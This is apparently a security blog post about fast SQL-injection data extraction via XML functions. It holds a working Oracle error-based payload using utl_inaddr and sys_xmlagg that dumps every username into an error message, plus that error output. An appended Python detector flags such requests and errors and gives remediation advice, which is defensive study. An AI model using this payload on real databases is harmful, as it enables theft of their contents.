New SQL Injection Whitepaper (for SQL Server)

Daniel Kachakil released an interesting whitepaper about fast data extraction using SQL Injection and XML statements on SQL Server, together with a tool implementing this technique called SFX-SQLI.

The paper describes how to retrieve data from a SQL Server database using SQL Injection and XML. This technique is not new (at least not to me): I have been using similar techniques in the Oracle environment via xmltransform or stragg for a while. It makes it possible to retrieve the entire content of a table in a single error message.

More details will be available in the SQL Injection book I am currently writing with some other security researchers.

The tool SFX-SQLI implements the concept for SQL Server.

Here is one example of how to export an entire table, in this case via utl_inaddr. The output is limited to 4000 bytes:

or 1= utl_inaddr.get_host_name((select xmltransform(sys_xmlagg(sys_xmlgen(username)),xmltype('<?xml version="1.0"?> ;
')).getstringval() listagg from all_users))--

Warning: ociexecute(): OCIStmtExecute: ORA-29257: host CUSTCOM_PROD;WEBTOOL;WEBDB;NELLDB;ERDB;B2B;BI;PM;SH;IX;OE;HR;SCOTT;MGMT_VIEW;MDDATA;SYSMAN;MDSYS;SI_INFORMTN_SCHEMA;ORDPLUGINS;ORDSYS;OLAPSYS;ANONYMOUS;XDB;CTXSYS;EXFSYS;WMSYS;DBSNMP;TSMSYS;DIP;OUTLN;SYSTEM;SYS; unknown ORA-06512: at "SYS.UTL_INADDR", line 4 ORA-06512: at "SYS.UTL_INADDR", line 35
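The error above has a recognisable shape from the defender's side: ORA-29257 normally names a single unresolvable host, but here the "host" is a semicolon-joined dump of a whole column. The following Python is an added example (not part of the original post, not the SFX-SQLI tool) showing detection logic for both sides of this pattern: requests that carry the aggregation and utl_inaddr calls, and application-log errors whose ORA-29257 "host" is clearly table content rather than a host name. All log lines, the thresholds and the function names are constructed for this example.

```python
import re
from typing import List, Optional, Tuple

# Added example, not code from the original post. Detection logic for the
# error-based extraction pattern the post describes. Log lines below are
# constructed and shaped like the post's output, not taken from a real system.

# Oracle raises ORA-29257 when utl_inaddr cannot resolve the host it was
# given; in the attack the "host" is the aggregated table content.
ORA_29257 = re.compile(r"ORA-29257: host (?P<host>.*?) unknown")

# Functions used in the post's payload. Any of them inside a request
# parameter of an ordinary web application is a strong indicator by itself.
SUSPICIOUS_FUNCS = re.compile(
    r"utl_inaddr|sys_xmlagg|sys_xmlgen|xmltransform|xmltype", re.IGNORECASE
)

# A real host name is short and contains no ';'. Threshold is an assumption.
MAX_PLAUSIBLE_HOST_LEN = 64


def inspect_error(line: str) -> Optional[str]:
    """Flag an ORA-29257 whose 'host' looks like exfiltrated data."""
    m = ORA_29257.search(line)
    if not m:
        return None
    host = m.group("host").strip()
    if ";" in host or len(host) > MAX_PLAUSIBLE_HOST_LEN:
        return "ora29257_data_in_host"
    return None


def inspect_request(line: str) -> Optional[str]:
    """Flag a web request whose parameters invoke the aggregation/DNS functions."""
    if SUSPICIOUS_FUNCS.search(line):
        return "sqli_function_in_request"
    return None


def leaked_values(line: str) -> List[str]:
    """For incident scoping: the values disclosed by one ORA-29257 error line."""
    m = ORA_29257.search(line)
    if not m or ";" not in m.group("host"):
        return []
    return [v for v in m.group("host").strip().split(";") if v]


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """Run the error check on Oracle error lines and the request check on the rest."""
    findings = []
    for n, line in enumerate(lines, 1):
        reason = inspect_error(line) if "ORA-" in line else inspect_request(line)
        if reason:
            findings.append((n, reason))
    return findings


# Constructed sample input: one malicious request, one error carrying data,
# one benign resolver error, one benign request.
SAMPLE_LOGS = [
    '10.0.0.5 - - [01/Jan/2010:10:00:00 +0000] "GET /list.php?id=1%20or%201='
    'utl_inaddr.get_host_name((select%20xmltransform(sys_xmlagg(sys_xmlgen('
    'username)) HTTP/1.1" 500 512',
    'PHP Warning: ociexecute(): OCIStmtExecute: ORA-29257: host '
    'HR;SCOTT;SYSTEM;SYS; unknown ORA-06512: at "SYS.UTL_INADDR", line 4',
    'PHP Warning: ociexecute(): OCIStmtExecute: ORA-29257: host '
    'mailhost.corp.example unknown ORA-06512: at "SYS.UTL_INADDR", line 4',
    '10.0.0.7 - - [01/Jan/2010:10:00:01 +0000] "GET /list.php?id=42 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for line_no, reason in scan(SAMPLE_LOGS):
        print(f"line {line_no}: {reason}")
        if reason == "ora29257_data_in_host":
            print("  disclosed:", leaked_values(SAMPLE_LOGS[line_no - 1]))
```

The two checks are deliberately independent: the request check catches the attempt even when the application swallows the error, and the error check catches the disclosure even when the request was logged elsewhere. The fix on the application side is the usual one the ociexecute() warning hints at: bind the user input with oci_bind_by_name() instead of concatenating it into the statement, and stop returning raw ORA- messages to the client. On the database side, revoking PUBLIC's EXECUTE privilege on UTL_INADDR removes this particular error channel for application accounts that do not need name resolution.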
